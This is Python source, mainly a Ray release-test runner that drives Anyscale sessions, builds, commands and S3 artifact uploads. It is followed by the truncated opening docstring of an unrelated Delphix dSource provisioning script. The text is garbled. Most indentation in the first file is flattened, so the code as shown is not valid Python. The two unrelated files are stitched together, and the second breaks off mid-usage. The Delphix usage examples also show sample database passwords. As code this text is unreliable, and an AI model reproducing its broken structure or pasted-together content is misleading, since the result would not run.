def install_app_config_packages(app_config: Dict[Any, Any]):
os.environ.update(app_config.get("env_vars", {}))
packages = app_config["python"]["pip_packages"]
for package in packages:
subprocess.check_output(["pip", "install", "-U", package], text=True)
def install_matching_ray():
wheel = os.environ.get("RAY_WHEELS", None)
if not wheel:
return
assert "manylinux2014_x86_64" in wheel, wheel
if sys.platform == "darwin":
platform = "macosx_10_15_intel"
elif sys.platform == "win32":
platform = "win_amd64"
else:
platform = "manylinux2014_x86_64"
wheel = wheel.replace("manylinux2014_x86_64", platform)
subprocess.check_output(["pip", "uninstall", "-y", "ray"], text=True)
subprocess.check_output(["pip", "install", "-U", wheel], text=True)
def wait_for_build_or_raise(sdk: AnyscaleSDK,
app_config_id: Optional[str]) -> Optional[str]:
if not app_config_id:
return None
# Fetch build
build_id = None
last_status = None
result = sdk.list_builds(app_config_id)
for build in sorted(result.results, key=lambda b: b.created_at):
build_id = build.id
last_status = build.status
if build.status == "failed":
continue
if build.status == "succeeded":
logger.info(f"Link to app config build: "
f"{anyscale_app_config_build_url(build_id)}")
return build_id
if last_status == "failed":
raise RuntimeError("App config build failed.")
if not build_id:
raise RuntimeError("No build found for app config.")
# Build found but not failed/finished yet
completed = False
start_wait = time.time()
next_report = start_wait + REPORT_S
logger.info(f"Waiting for build {build_id} to finish...")
logger.info(f"Track progress here: "
f"{anyscale_app_config_build_url(build_id)}")
while not completed:
now = time.time()
if now > next_report:
logger.info(f"... still waiting for build {build_id} to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
result = sdk.get_build(build_id)
build = result.result
if build.status == "failed":
raise RuntimeError(
f"App config build failed. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
if build.status == "succeeded":
logger.info("Build succeeded.")
return build_id
completed = build.status not in ["in_progress", "pending"]
if completed:
raise RuntimeError(
f"Unknown build status: {build.status}. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
time.sleep(1)
return build_id
def run_job(cluster_name: str, compute_tpl_name: str, cluster_env_name: str,
job_name: str, min_workers: str, script: str,
script_args: List[str], env_vars: Dict[str, str],
autosuspend: int) -> Tuple[int, str]:
# Start cluster and job
address = f"anyscale://{cluster_name}?cluster_compute={compute_tpl_name}" \
f"&cluster_env={cluster_env_name}&autosuspend={autosuspend}" \
"&&update=True"
logger.info(f"Starting job {job_name} with Ray address: {address}")
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
env.update(env_vars)
env["RAY_ADDRESS"] = address
env["RAY_JOB_NAME"] = job_name
env["RAY_RELEASE_MIN_WORKERS"] = str(min_workers)
proc = subprocess.Popen(
script.split(" ") + script_args,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True)
proc.stdout.reconfigure(line_buffering=True)
logs = ""
for line in proc.stdout:
logs += line
sys.stdout.write(line)
proc.wait()
return proc.returncode, logs
def create_and_wait_for_session(
sdk: AnyscaleSDK,
stop_event: multiprocessing.Event,
session_name: str,
session_options: Dict[Any, Any],
) -> str:
# Create session
logger.info(f"Creating session {session_name}")
result = sdk.create_session(session_options)
session_id = result.result.id
# Trigger session start
logger.info(f"Starting session {session_name} ({session_id})")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result = sdk.start_session(session_id, start_session_options={})
sop_id = result.result.id
completed = result.result.completed
# Wait for session
logger.info(f"Waiting for session {session_name}...")
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
_check_stop(stop_event, "session")
now = time.time()
if now > next_report:
logger.info(f"... still waiting for session {session_name} "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
session_operation_response = sdk.get_session_operation(
sop_id, _request_timeout=30)
session_operation = session_operation_response.result
completed = session_operation.completed
time.sleep(1)
return session_id
def run_session_command(sdk: AnyscaleSDK,
session_id: str,
cmd_to_run: str,
result_queue: multiprocessing.Queue,
env_vars: Dict[str, str],
state_str: str = "CMD_RUN") -> Tuple[str, int]:
full_cmd = " ".join(f"{k}={v}"
for k, v in env_vars.items()) + " " + cmd_to_run
logger.info(f"Running command in session {session_id}: \n" f"{full_cmd}")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result_queue.put(State(state_str, time.time(), None))
result = sdk.create_session_command(
dict(session_id=session_id, shell_command=full_cmd))
scd_id = result.result.id
return scd_id, result
def wait_for_session_command_to_complete(create_session_command_result,
sdk: AnyscaleSDK,
scd_id: str,
stop_event: multiprocessing.Event,
state_str: str = "CMD_RUN"):
result = create_session_command_result
completed = result.result.finished_at is not None
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
if state_str == "CMD_RUN":
_check_stop(stop_event, "command")
elif state_str == "CMD_PREPARE":
_check_stop(stop_event, "prepare_command")
now = time.time()
if now > next_report:
logger.info(f"... still waiting for command to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
result = sdk.get_session_command(session_command_id=scd_id)
        completed = result.result.finished_at is not None
time.sleep(1)
status_code = result.result.status_code
runtime = time.time() - start_wait
if status_code != 0:
if state_str == "CMD_RUN":
raise RuntimeError(
f"Command returned non-success status: {status_code}")
elif state_str == "CMD_PREPARE":
raise PrepareCommandRuntimeError(
f"Prepare command returned non-success status: {status_code}")
return status_code, runtime
def get_command_logs(session_controller: SessionController,
scd_id: str,
lines: int = 50):
result = session_controller.api_client.get_execution_logs_api_v2_session_commands_session_command_id_execution_logs_get( # noqa: E501
session_command_id=scd_id,
start_line=-1 * lines,
end_line=0)
return result.result.lines
def get_remote_json_content(
temp_dir: str,
session_name: str,
remote_file: Optional[str],
session_controller: SessionController,
):
if not remote_file:
logger.warning("No remote file specified, returning empty dict")
return {}
local_target_file = os.path.join(temp_dir, ".tmp.json")
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
with open(local_target_file, "rt") as f:
return json.load(f)
def get_local_json_content(local_file: Optional[str]):
if not local_file:
logger.warning("No local file specified, returning empty dict")
return {}
with open(local_file, "rt") as f:
return json.load(f)
def pull_artifacts_and_store_in_cloud(
temp_dir: str,
logs: str,
session_name: str,
test_name: str,
artifacts: Optional[Dict[Any, Any]],
session_controller: SessionController,
):
output_log_file = os.path.join(temp_dir, "output.log")
with open(output_log_file, "wt") as f:
f.write(logs)
bucket = GLOBAL_CONFIG["RELEASE_AWS_BUCKET"]
location = f"{GLOBAL_CONFIG['RELEASE_AWS_LOCATION']}" \
f"/{session_name}/{test_name}"
saved_artifacts = {}
s3_client = boto3.client("s3")
s3_client.upload_file(output_log_file, bucket, f"{location}/output.log")
saved_artifacts["output.log"] = f"s3://{bucket}/{location}/output.log"
# Download artifacts
if artifacts:
for name, remote_file in artifacts.items():
logger.info(f"Downloading artifact `{name}` from "
f"{remote_file}")
local_target_file = os.path.join(temp_dir, name)
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
# Upload artifacts to s3
s3_client.upload_file(local_target_file, bucket,
f"{location}/{name}")
saved_artifacts[name] = f"s3://{bucket}/{location}/{name}"
return saved_artifacts
def find_session_by_test_name(
sdk: AnyscaleSDK,
session_controller: SessionController,
temp_dir: str,
state_json: str,
project_id: str,
test_name: str,
) -> Optional[Tuple[str, str, Dict[Any, Any]]]:
paging_token = None
while True: # Will break if paging_token is None after first search
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(
name=dict(contains=test_name),
state_filter=["Running"],
paging=dict(count=20, paging_token=paging_token)))
for session in result.results:
logger.info(f"Found sessions {session.name}")
if not session.name.startswith(test_name):
continue
try:
session_state = get_remote_json_content(
temp_dir=temp_dir,
session_name=session.name,
remote_file=state_json,
session_controller=session_controller)
except Exception as exc:
raise RuntimeError(f"Could not get remote json content "
f"for session {session.name}") from exc
if session_state.get("test_name") == test_name:
return session.id, session.name, session_state
        # Advance the paging token, otherwise the same page would be
        # fetched forever.
        paging_token = result.metadata.next_paging_token
        if not paging_token:
            return None
def get_latest_running_command_id(sdk: AnyscaleSDK, session_id: str
) -> Tuple[Optional[str], Optional[bool]]:
scd_id = None
paging_token = None
success = None
while not scd_id:
result = sdk.list_session_commands(
session_id=session_id, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for cmd in result.results:
if not scd_id:
scd_id = cmd.id
completed = cmd.finished_at is not None
if completed:
if success is None:
success = True
success = success and cmd.status_code == 0
if not completed:
return cmd.id, None
return scd_id, success or False
def run_test_config(
local_dir: str,
project_id: str,
test_name: str,
test_config: Dict[Any, Any],
commit_url: str,
session_name: str = None,
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress: bool = False,
upload_artifacts: bool = True,
app_config_id_override: Optional[str] = None,
) -> Dict[Any, Any]:
"""
Returns:
Dict with the following entries:
status (str): One of [finished, error, timeout]
command_link (str): Link to command (Anyscale web UI)
last_logs (str): Last logs (excerpt) to send to owner
artifacts (dict): Dict of artifacts
Key: Name
Value: S3 URL
"""
# Todo (mid-term): Support other cluster definitions
# (not only cluster configs)
cluster_config_rel_path = test_config["cluster"].get(
"cluster_config", None)
cluster_config = _load_config(local_dir, cluster_config_rel_path)
app_config_rel_path = test_config["cluster"].get("app_config", None)
app_config = _load_config(local_dir, app_config_rel_path)
compute_tpl_rel_path = test_config["cluster"].get("compute_template", None)
compute_tpl = _load_config(local_dir, compute_tpl_rel_path)
stop_event = multiprocessing.Event()
result_queue = multiprocessing.Queue()
if not session_name:
session_name = f"{test_name}_{int(time.time())}"
temp_dir = tempfile.mkdtemp()
# Result and state files
results_json = test_config["run"].get("results", None)
if results_json is None:
results_json = "/tmp/release_test_out.json"
state_json = test_config["run"].get("state", None)
if state_json is None:
state_json = "/tmp/release_test_state.json"
env_vars = {
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto"),
"TEST_OUTPUT_JSON": results_json,
"TEST_STATE_JSON": state_json,
"IS_SMOKE_TEST": "1" if smoke_test else "0",
}
with open(os.path.join(local_dir, ".anyscale.yaml"), "wt") as f:
f.write(f"project_id: {project_id}")
os.chdir(local_dir)
# Setup interface
# Unfortunately, there currently seems to be no great way to
# transfer files with the Anyscale SDK.
# So we use the session controller instead.
sdk = AnyscaleSDK(auth_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"])
session_controller = SessionController(
api_client=instantiate_api_client(
cli_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"],
host=GLOBAL_CONFIG["ANYSCALE_HOST"],
),
anyscale_api_client=sdk.api_client,
)
timeout = test_config["run"].get("timeout", 1800)
if "RELEASE_OVERRIDE_TIMEOUT" in os.environ:
previous_timeout = timeout
timeout = int(os.environ.get("RELEASE_OVERRIDE_TIMEOUT", str(timeout)))
logger.warning(f"Release test timeout override: {timeout} "
f"(would have been {previous_timeout})")
# If a test is long running, timeout does not mean it failed
is_long_running = test_config["run"].get("long_running", False)
build_id_override = None
if test_config["run"].get("use_connect"):
autosuspend_mins = test_config["run"].get("autosuspend_mins", 5)
assert not kick_off_only, \
"Unsupported for running with Anyscale connect."
if app_config_id_override is not None:
logger.info(
"Using connect and an app config override, waiting until "
"build finishes so we can fetch the app config in order to "
"install its pip packages locally.")
build_id_override = wait_for_build_or_raise(
sdk, app_config_id_override)
response = sdk.get_cluster_environment_build(build_id_override)
app_config = response.result.config_json
install_app_config_packages(app_config)
install_matching_ray()
elif "autosuspend_mins" in test_config["run"]:
raise ValueError(
"'autosuspend_mins' is only supported if 'use_connect' is True.")
# Add information to results dict
def _update_results(results: Dict):
if "last_update" in results:
results["last_update_diff"] = time.time() - results["last_update"]
if smoke_test:
results["smoke_test"] = True
def _process_finished_command(session_controller: SessionController,
scd_id: str,
results: Optional[Dict] = None,
runtime: int = None,
commit_url: str = None,
session_url: str = None):
logger.info("Command finished successfully.")
if results_json:
results = results or get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
else:
results = {"passed": 1}
_update_results(results)
if scd_id:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
else:
logs = "No command found to fetch logs for"
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=test_config.get("artifacts", {}),
session_controller=session_controller,
)
logger.info("Fetched results and stored on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
# Add these metadata here to avoid changing SQL schema.
results["_runtime"] = runtime
results["_session_url"] = session_url
results["_commit_url"] = commit_url
results["_stable"] = test_config.get("stable", True)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
# When running the test script in client mode, the finish command is a
# completed local process.
def _process_finished_client_command(returncode: int, logs: str):
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=None,
session_controller=None,
)
logger.info("Stored results on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
if results_json:
            results = get_local_json_content(local_file=results_json)
else:
results = {
"passed": int(returncode == 0),
}
results["returncode"] = returncode
_update_results(results)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
def _run(logger):
# These values will be set as the test runs.
session_url = None
runtime = None
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
session_id = None
scd_id = None
try:
# First, look for running sessions
session_id = search_running_session(sdk, project_id, session_name)
compute_tpl_name = None
app_config_id = app_config_id_override
app_config_name = None
build_id = build_id_override
if not session_id:
logger.info("No session found.")
# Start session
session_options = dict(
name=session_name, project_id=project_id)
if cluster_config is not None:
logging.info("Starting session with cluster config")
cluster_config_str = json.dumps(cluster_config)
session_options["cluster_config"] = cluster_config_str
session_options["cloud_id"] = (
GLOBAL_CONFIG["ANYSCALE_CLOUD_ID"], )
session_options["uses_app_config"] = False
else:
logging.info("Starting session with app/compute config")
# Find/create compute template
compute_tpl_id, compute_tpl_name = \
create_or_find_compute_template(
sdk, project_id, compute_tpl)
logger.info(f"Link to compute template: "
f"{anyscale_compute_tpl_url(compute_tpl_id)}")
# Find/create app config
if app_config_id is None:
(
app_config_id,
app_config_name,
) = create_or_find_app_config(sdk, project_id,
app_config)
else:
logger.info(
f"Using override app config {app_config_id}")
app_config_name = sdk.get_app_config(
app_config_id).result.name
if build_id is None:
# We might have already retrieved the build ID when
# installing app config packages locally if using
# connect, so only get the build ID if it's not set.
build_id = wait_for_build_or_raise(sdk, app_config_id)
session_options["compute_template_id"] = compute_tpl_id
session_options["build_id"] = build_id
session_options["uses_app_config"] = True
if not test_config["run"].get("use_connect"):
session_id = create_and_wait_for_session(
sdk=sdk,
stop_event=stop_event,
session_name=session_name,
session_options=session_options,
)
if test_config["run"].get("use_connect"):
assert compute_tpl_name, "Compute template must exist."
assert app_config_name, "Cluster environment must exist."
script_args = test_config["run"].get("args", [])
if smoke_test:
script_args += ["--smoke-test"]
min_workers = 0
for node_type in compute_tpl["worker_node_types"]:
min_workers += node_type["min_workers"]
# Build completed, use job timeout
result_queue.put(State("CMD_RUN", time.time(), None))
returncode, logs = run_job(
cluster_name=test_name,
compute_tpl_name=compute_tpl_name,
cluster_env_name=app_config_name,
job_name=session_name,
min_workers=min_workers,
script=test_config["run"]["script"],
script_args=script_args,
env_vars=env_vars,
autosuspend=autosuspend_mins)
_process_finished_client_command(returncode, logs)
return
# Write test state json
test_state_file = os.path.join(local_dir, "test_state.json")
with open(test_state_file, "wt") as f:
json.dump({
"start_time": time.time(),
"test_name": test_name
}, f)
# Rsync up
logger.info("Syncing files to session...")
session_controller.push(
session_name=session_name,
source=None,
target=None,
config=None,
all_nodes=False,
)
logger.info("Syncing test state to session...")
session_controller.push(
session_name=session_name,
source=test_state_file,
target=state_json,
config=None,
all_nodes=False,
)
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
session_id=session_id)
_check_stop(stop_event, "file_sync")
# Optionally run preparation command
prepare_command = test_config["run"].get("prepare")
if prepare_command:
logger.info(f"Running preparation command: {prepare_command}")
scd_id, result = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=prepare_command,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_PREPARE")
_, _ = wait_for_session_command_to_complete(
result,
sdk=sdk,
scd_id=scd_id,
stop_event=stop_event,
state_str="CMD_PREPARE")
# Run release test command
cmd_to_run = test_config["run"]["script"] + " "
args = test_config["run"].get("args", [])
if args:
cmd_to_run += " ".join(args) + " "
if smoke_test:
cmd_to_run += " --smoke-test"
scd_id, result = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=cmd_to_run,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_RUN")
if not kick_off_only:
_, runtime = wait_for_session_command_to_complete(
result,
sdk=sdk,
scd_id=scd_id,
stop_event=stop_event,
state_str="CMD_RUN")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
runtime=runtime,
session_url=session_url,
commit_url=commit_url)
else:
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": ""
}))
except (ReleaseTestTimeoutError, Exception) as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = logs + "; Command logs:" + get_command_logs(
session_controller, scd_id,
test_config.get("log_lines", 50))
except Exception as e2:
logger.error(e2, exc_info=True)
# Long running tests are "finished" successfully when
# timed out
if isinstance(e, ReleaseTestTimeoutError) and is_long_running:
_process_finished_command(
session_controller=session_controller, scd_id=scd_id)
else:
timeout_type = ""
runtime = None
if isinstance(e, CommandTimeoutError):
timeout_type = "timeout"
runtime = 0
elif (isinstance(e, PrepareCommandTimeoutError)
or isinstance(e, FileSyncTimeoutError)
or isinstance(e, SessionTimeoutError)
or isinstance(e, PrepareCommandRuntimeError)):
timeout_type = "infra_timeout"
runtime = None
elif isinstance(e, RuntimeError):
timeout_type = "runtime_error"
runtime = 0
else:
timeout_type = "unknown timeout"
runtime = None
# Add these metadata here to avoid changing SQL schema.
results = {}
results["_runtime"] = runtime
results["_session_url"] = session_url
results["_commit_url"] = commit_url
results["_stable"] = test_config.get("stable", True)
result_queue.put(
State(
"END", time.time(), {
"status": timeout_type,
"last_logs": logs,
"results": results
}))
finally:
if no_terminate:
logger.warning(
"`no_terminate` is set to True, so the session will "
"*not* be terminated!")
else:
_cleanup_session(sdk, session_id)
def _check_progress(logger):
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
should_terminate = False
session_id = None
scd_id = None
try:
existing_session = find_session_by_test_name(
sdk=sdk,
session_controller=session_controller,
temp_dir=temp_dir,
state_json=state_json,
project_id=project_id,
test_name=test_name)
if existing_session is None:
logger.info(f"Found no existing session for {test_name}")
result_queue.put(
State("END", time.time(), {
"status": "nosession",
"last_logs": ""
}))
return
session_id, session_name, session_state = existing_session
logger.info(f"Found existing session for {test_name}: "
f"{session_name}")
scd_id, success = get_latest_running_command_id(
sdk=sdk, session_id=session_id)
latest_result = get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
# Fetch result json and check if it has been updated recently
result_time_key = test_config["run"].get("time_key", None)
maximum_update_delay = test_config["run"].get(
"max_update_delay", None)
if result_time_key and maximum_update_delay:
last_update = latest_result.get(result_time_key, None)
if not last_update:
result_queue.put(
State(
"END", time.time(), {
"status": "error",
"last_logs": f"Test did not store "
f"{result_time_key} in the "
f"results json."
}))
return
delay = time.time() - last_update
logger.info(f"Last update was at {last_update:.2f}. "
f"This was {delay:.2f} seconds ago "
f"(maximum allowed: {maximum_update_delay})")
if delay > maximum_update_delay:
raise RuntimeError(
f"Test did not update the results json within "
f"the last {maximum_update_delay} seconds.")
if time.time() - session_state["start_time"] > timeout:
# Long running test reached timeout
logger.info(
f"Test command reached timeout after {timeout} seconds")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
elif success:
logger.info("All commands finished.")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
else:
rest_time = timeout - time.time() + session_state["start_time"]
logger.info(f"Test command should continue running "
f"for {rest_time} seconds")
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": "Test is still running"
}))
except Exception as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
logs += f"\n{str(e)}"
except Exception as e2:
logger.error(e2, exc_info=True)
result_queue.put(
State("END", time.time(), {
"status": "error",
"last_logs": logs
}))
should_terminate = True
finally:
if should_terminate:
logger.warning("Terminating session")
_cleanup_session(sdk, session_id)
if not check_progress:
process = multiprocessing.Process(target=_run, args=(logger, ))
else:
process = multiprocessing.Process(
target=_check_progress, args=(logger, ))
build_timeout = test_config["run"].get("build_timeout", 1800)
project_url = anyscale_project_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"])
logger.info(f"Link to project: {project_url}")
msg = f"This will now run test {test_name}."
if smoke_test:
msg += " This is a smoke test."
if is_long_running:
msg += " This is a long running test."
logger.info(msg)
logger.info(f"Starting process with timeout {timeout} "
f"(build timeout {build_timeout})")
process.start()
# The timeout time will be updated after the build finished
# Build = App config + compute template build and session start
timeout_time = time.time() + build_timeout
result = {}
while process.is_alive():
try:
state: State = result_queue.get(timeout=1)
except (Empty, TimeoutError):
if time.time() > timeout_time:
stop_event.set()
logger.warning("Process timed out.")
if not is_long_running:
logger.warning("Terminating process in 10 seconds.")
time.sleep(10)
logger.warning("Terminating process now.")
process.terminate()
else:
logger.info("Process is long running. Give 2 minutes to "
"fetch result and terminate.")
start_terminate = time.time()
                    while (time.time() < start_terminate + 120
                           and process.is_alive()):
time.sleep(1)
if process.is_alive():
logger.warning("Terminating forcefully now.")
process.terminate()
else:
logger.info("Long running results collected.")
break
continue
        if not isinstance(state, State):
            raise RuntimeError(f"Expected `State` object, got {state}")
if state.state == "CMD_PREPARE":
# Reset timeout after build finished
timeout_time = state.timestamp + timeout
if state.state == "CMD_RUN":
# Reset timeout after prepare command or build finished
timeout_time = state.timestamp + timeout
elif state.state == "END":
result = state.data
break
    logger.info("Final check if everything worked.")
    try:
        # Drain the queue; get_nowait() can still raise Empty if we race
        # with the producer between empty() and get_nowait().
        while not result_queue.empty():
            state = result_queue.get_nowait()
            result = state.data
        result.setdefault("status", "error (status not found)")
    except (TimeoutError, Empty):
        result = {"status": "timeout", "last_logs": "Test timed out."}
logger.info(f"Final results: {result}")
log_results_and_artifacts(result)
shutil.rmtree(temp_dir)
return result
def run_test(test_config_file: str,
test_name: str,
project_id: str,
commit_url: str,
category: str = "unspecified",
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress=False,
report=True,
session_name=None,
app_config_id_override=None):
with open(test_config_file, "rt") as f:
test_configs = yaml.load(f, Loader=yaml.FullLoader)
test_config_dict = {}
for test_config in test_configs:
name = test_config.pop("name")
test_config_dict[name] = test_config
if test_name not in test_config_dict:
raise ValueError(
f"Test with name `{test_name}` not found in test config file "
f"at `{test_config_file}`.")
test_config = test_config_dict[test_name]
if smoke_test and "smoke_test" in test_config:
smoke_test_config = test_config.pop("smoke_test")
test_config = _deep_update(test_config, smoke_test_config)
local_dir = os.path.dirname(test_config_file)
if "local_dir" in test_config:
# local_dir is relative to test_config_file
local_dir = os.path.join(local_dir, test_config["local_dir"])
if test_config["run"].get("use_connect"):
assert not kick_off_only, \
"--kick-off-only is unsupported when running with " \
"Anyscale connect."
assert not check_progress, \
"--check is unsupported when running with Anyscale connect."
if test_config.get("artifacts", {}):
            logger.error(
                "Saving artifacts is not yet supported when running with "
                "Anyscale connect.")
result = run_test_config(
local_dir,
project_id,
test_name,
test_config,
commit_url,
session_name=session_name,
smoke_test=smoke_test,
no_terminate=no_terminate,
kick_off_only=kick_off_only,
check_progress=check_progress,
upload_artifacts=report,
app_config_id_override=app_config_id_override)
status = result.get("status", "invalid")
if kick_off_only:
if status != "kickoff":
raise RuntimeError("Error kicking off test.")
logger.info("Kicked off test. It's now up to the `--check` "
"part of the script to track its process.")
return
else:
# `--check` or no kick off only
if status == "nosession":
logger.info(f"No running session found for test {test_name}, so "
f"assuming everything is fine.")
return
if status == "kickoff":
logger.info(f"Test {test_name} is still running.")
return
last_logs = result.get("last_logs", "No logs.")
test_suite = os.path.basename(test_config_file).replace(".yaml", "")
report_kwargs = dict(
test_suite=test_suite,
test_name=test_name,
status=status,
logs=last_logs,
results=result.get("results", {}),
artifacts=result.get("artifacts", {}),
category=category,
)
if report:
report_result(**report_kwargs)
else:
logger.info(f"Usually I would now report the following results:\n"
f"{report_kwargs}")
if has_errored(result):
raise RuntimeError(last_logs)
return
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
"--test-config", type=str, required=True, help="Test config file")
parser.add_argument("--test-name", type=str, help="Test name in config")
parser.add_argument(
"--ray-wheels", required=False, type=str, help="URL to ray wheels")
parser.add_argument(
"--no-terminate",
action="store_true",
default=False,
help="Don't terminate session after failure")
parser.add_argument(
"--no-report",
action="store_true",
default=False,
help="Do not report any results or upload to S3")
parser.add_argument(
"--kick-off-only",
action="store_true",
default=False,
help="Kick off only (don't wait for command to finish)")
parser.add_argument(
"--check",
action="store_true",
default=False,
help="Check (long running) status")
parser.add_argument(
"--category",
type=str,
default="unspecified",
help="Category name, e.g. `release-1.3.0` (will be saved in database)")
parser.add_argument(
"--smoke-test", action="store_true", help="Finish quickly for testing")
parser.add_argument(
"--session-name",
required=False,
type=str,
help="Name of the session to run this test.")
parser.add_argument(
"--app-config-id-override",
required=False,
type=str,
help=("An app config ID, which will override the test config app "
"config."))
args, _ = parser.parse_known_args()
if not GLOBAL_CONFIG["ANYSCALE_PROJECT"]:
raise RuntimeError(
"You have to set the ANYSCALE_PROJECT environment variable!")
maybe_fetch_api_token()
    # Initialize so `url` is defined even when --check is set and no
    # wheels were passed (it is only used as the commit URL below).
    url = None
    if args.ray_wheels:
        os.environ["RAY_WHEELS"] = str(args.ray_wheels)
        url = str(args.ray_wheels)
elif not args.check:
url = find_ray_wheels(
GLOBAL_CONFIG["RAY_REPO"],
GLOBAL_CONFIG["RAY_BRANCH"],
GLOBAL_CONFIG["RAY_VERSION"],
)
if not url:
raise RuntimeError(f"Could not find wheels for "
f"Ray {GLOBAL_CONFIG['RAY_VERSION']}, "
f"branch {GLOBAL_CONFIG['RAY_BRANCH']}")
test_config_file = os.path.abspath(os.path.expanduser(args.test_config))
run_test(
test_config_file=test_config_file,
test_name=args.test_name,
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
commit_url=url,
category=args.category,
smoke_test=args.smoke_test,
no_terminate=args.no_terminate or args.kick_off_only,
kick_off_only=args.kick_off_only,
check_progress=args.check,
report=not args.no_report,
session_name=args.session_name,
app_config_id_override=args.app_config_id_override,
)
|
dx_provision_dsource.py | #!/usr/bin/env python
# Corey Brune - Feb 2017
# Description:
# Create and sync a dSource
#
# Requirements
# pip install docopt delphixpy
# The below doc follows the POSIX compliant standards and allows us to use
# this doc to also define our arguments for the script.
"""Create and sync a dSource
Usage:
dx_provision_dsource.py (--type <name>)
dx_provision_dsource.py --type <name> --dsource_name <name> --ip_addr <name> --db_name <name> --env_name <name> --db_install_path <name> --dx_group <name> --db_passwd <name> --db_user <name> [--port_num <name>][--num_connections <name>][--link_now <name>][--files_per_set <name>][--rman_channels <name>]
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_provision_dsource.py --type <name> --dsource_name <name> --ase_user <name> --ase_passwd <name> --backup_path <name> --source_user <name> --stage_user aseadmin --stage_repo ASE1570_S2 --src_config <name> --env_name <name> --dx_group <name> [--bck_file <name>][--create_bckup]
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_provision_dsource.py --type <name> --dsource_name <name> --dx_group <name> --db_passwd <name> --db_user <name> --stage_instance <name> --stage_env <name> --backup_path <name> [--backup_loc_passwd <passwd> --backup_loc_user <name> --logsync [--sync_mode <mode>] --load_from_backup]
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_provision_dsource.py -h | --help | -v | --version
Create and sync a dSource
Examples:
Oracle:
dx_provision_dsource.py --type oracle --dsource_name oradb1 --ip_addr 192.168.166.11 --db_name srcDB1 --env_name SourceEnv --db_install_path /u01/app/oracle/product/11.2.0.4/dbhome_1 --db_user delphixdb --db_passwd delphixdb
Sybase:
dx_provision_dsource.py --type sybase --dsource_name dbw1 --ase_user sa --ase_passwd sybase --backup_path /data/db --source_user aseadmin --stage_user aseadmin --stage_repo ASE1570_S2 --src_config dbw1 --env_name aseSource --dx_group Sources
Specify backup files:
dx_provision_dsource.py --type sybase --dsource_name dbw2 --ase_user sa --ase_passwd sybase --backup_path /data/db --source_user aseadmin --stage_user aseadmin --stage_repo ASE1570_S2 --src_config dbw2 --env_name aseSource --dx_group Sources --bck_file "dbw2data.dat"
Create a new backup and ingest:
